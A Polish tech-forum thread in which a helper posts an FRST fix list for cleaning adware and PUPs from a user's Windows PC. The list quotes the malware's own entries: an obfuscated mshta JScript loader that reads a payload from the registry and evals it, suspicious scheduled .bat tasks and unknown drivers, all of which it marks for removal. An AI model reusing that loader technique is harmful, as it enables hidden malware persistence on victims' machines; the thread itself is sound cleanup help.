Elektroda.pl

PUP.optional and Adware.File Tour

chertis 13 Jan 2018 20:00 447 1
  • #2 13 Jan 2018 20:19
    Kolobos
    Computer specialist

    Run Fixlist.txt for FRST:
    HKU\.DEFAULT\Software\Classes\8a8b7f1d: "C:\WINDOWS\system32\mshta.exe" "javascript:Wy2ipi9Zr="zvak6H";j38N=new ActiveXObject("WScript.Shell");Ht5R9i="8oW6";vrT08D=j38N.RegRead("HKCU\\software\\lqxzwsa\\aqudaex");YEV0NwSS="lWRvA54";eval(vrT08D);WmZ0K="ZPC0v6B";" <==== UWAGA
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ContextMenuHandlers1: [Foxit_ConvertToPDF_Reader] -> [CC]{A94757A0-0226-426F-B4F1-4DF381C630D3} => -> Brak pliku
    ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku
    ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku
    ContextMenuHandlers3: [00avg] -> [CC]{472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku
    ContextMenuHandlers6: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku
    Task: {0FA25FB1-1B7E-47BF-868D-A6AE0E926E92} - System32\Tasks\GrOuMmoeaUWY => C:\Users\user\OIiqgAhaorQX.bat [2014-11-21] () <==== UWAGA
    Task: {40CBF3F3-0631-4880-A9A6-3487A677B66B} - System32\Tasks\RlfAVkIuOH => C:\WINDOWS\OwwNNrI.exe [2016-05-05] (Microsoft Corporation)
    Task: {4B8E6A01-2F45-47A6-A6FE-AAB13D141BCD} - System32\Tasks\{CD3736CE-9E89-448D-957F-A6A0811F7C35} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxps://ui.skype.com/ui/0/7.29.64.102/pl/abandoninstall?page=tsProgressBar
    Task: {5741BC7F-FC1C-4D46-90D5-7C03924A5A81} - System32\Tasks\OLBIREIyvAe => C:\Users\user\AppData\Roaming\eIoUEDIzmHBi.bat [2014-11-21] () <==== UWAGA
    HKU\S-1-5-21-2526505940-863762974-4231048401-1001\...\MountPoints2: {854f09f9-a19a-11e6-be98-6036dd0129cf} - "F:\Startme.exe"
    HKU\S-1-5-21-2526505940-863762974-4231048401-1001\...\MountPoints2: {87f3ea26-9c77-11e7-bedf-6036dd0129cf} - "F:\startme.exe"
    HKU\S-1-5-21-2526505940-863762974-4231048401-501\...\Run: [HydraVisionDesktopManager] => "C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe"
    HKU\S-1-5-21-2526505940-863762974-4231048401-501\...\Run: [Google Update] => C:\Users\Gość\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-10-01] (Google Inc.)
    GroupPolicy: Ograniczenia <==== UWAGA
    GroupPolicy\User: Ograniczenia <==== UWAGA
    CHR HKLM-x32\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn] - hxxps://clients2.google.com/service/update2/crx
    S1 umbuxaae; \??\C:\WINDOWS\system32\drivers\umbuxaae.sys [X]
    S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]




    2018-01-13 19:42 - 2018-01-13 19:43 - 001753600 _____ (Farbar) C:\Users\user\Downloads\FRST (1).exe
    2018-01-13 19:34 - 2018-01-13 19:36 - 000000000 ____D C:\AdwCleaner
    2018-01-07 00:43 - 2018-01-07 00:47 - 000000000 ____D C:\Users\user\AppData\Local\Lite
    2018-01-07 00:42 - 2018-01-13 19:06 - 000003470 _____ C:\WINDOWS\System32\Tasks\OLBIREIyvAe
    2018-01-07 00:42 - 2018-01-13 18:19 - 000003236 _____ C:\WINDOWS\System32\Tasks\GrOuMmoeaUWY
    2018-01-07 00:42 - 2018-01-07 00:42 - 000003572 _____ C:\WINDOWS\System32\Tasks\RlfAVkIuOH
    2018-01-07 00:42 - 2016-05-05 17:37 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\OwwNNrI.exe
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001247 _____ C:\Users\user\AppData\Local\ArOEOyUuITaE
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001069 _____ C:\Program Files (x86)\AeOfXIUiKYW
    2018-01-07 00:42 - 2014-11-21 05:59 - 000000070 _____ C:\Users\user\OIiqgAhaorQX
    2018-01-07 00:42 - 2014-11-21 05:59 - 000000064 _____ C:\Users\user\AppData\Roaming\eIoUEDIzmHBi
    2014-11-21 05:59 - 2014-11-21 05:59 - 000000070 _____ () C:\Users\user\OIiqgAhaorQX.bat
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001069 _____ () C:\Program Files (x86)\AeOfXIUiKYW
    2014-11-21 05:59 - 2014-11-21 05:59 - 000001069 _____ () C:\Program Files (x86)\AeOfXIUiKYW.bat
    2018-01-07 00:42 - 2014-11-21 06:00 - 000197120 _____ (Microsoft Corporation) C:\Program Files (x86)\Common Files\YEADUejzIoOr.exe
    2018-01-07 00:42 - 2014-11-21 05:59 - 000000064 _____ () C:\Users\user\AppData\Roaming\eIoUEDIzmHBi
    2014-11-21 05:59 - 2014-11-21 05:59 - 000000064 _____ () C:\Users\user\AppData\Roaming\eIoUEDIzmHBi.bat
    2016-05-22 18:23 - 2016-07-21 23:23 - 000000105 _____ () C:\Users\user\AppData\Roaming\WB.CFG
    2018-01-07 00:42 - 2014-11-21 05:59 - 000001247 _____ () C:\Users\user\AppData\Local\ArOEOyUuITaE
    2014-11-21 05:59 - 2014-11-21 05:59 - 000001247 _____ () C:\Users\user\AppData\Local\ArOEOyUuITaE.bat
    2017-06-15 07:02 - 2017-06-15 07:02 - 000007915 _____ () C:\Users\user\AppData\Local\Temp\1037418701.exe
    2017-06-15 07:02 - 2017-06-15 07:02 - 000007915 _____ () C:\Users\user\AppData\Local\Temp\111646063.exe
    2017-06-15 07:02 - 2017-06-15 07:02 - 000007915 _____ () C:\Users\user\AppData\Local\Temp\2867326218.exe
    2018-01-07 00:40 - 2018-01-07 00:41 - 002575544 _____ () C:\Users\user\AppData\Local\Temp\569lu3124d.exe
